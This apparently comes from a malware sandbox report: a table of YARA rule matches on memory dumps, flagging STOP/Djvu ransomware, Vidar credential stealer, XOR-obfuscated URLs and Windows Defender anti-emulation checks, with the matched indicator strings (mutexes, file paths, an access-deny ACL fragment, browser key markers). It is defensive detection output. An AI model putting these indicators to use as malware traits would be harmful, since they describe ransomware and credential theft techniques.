00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000000.00000002.372586217.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x92dbc:$s1: JohnDoe 0x92db4:$s2: HAL9TH
00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x970c0:$s1: "os_crypt":{"encrypted_key":" 0x9c9ec:$s2: screenshot.jpg 0x92edc:$s3: Content-Disposition: form-data; name="
00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000000.444362220.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000000.443754682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000A.00000002.419401145.00000000022F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000000.441751183.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000011.00000002.450360097.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
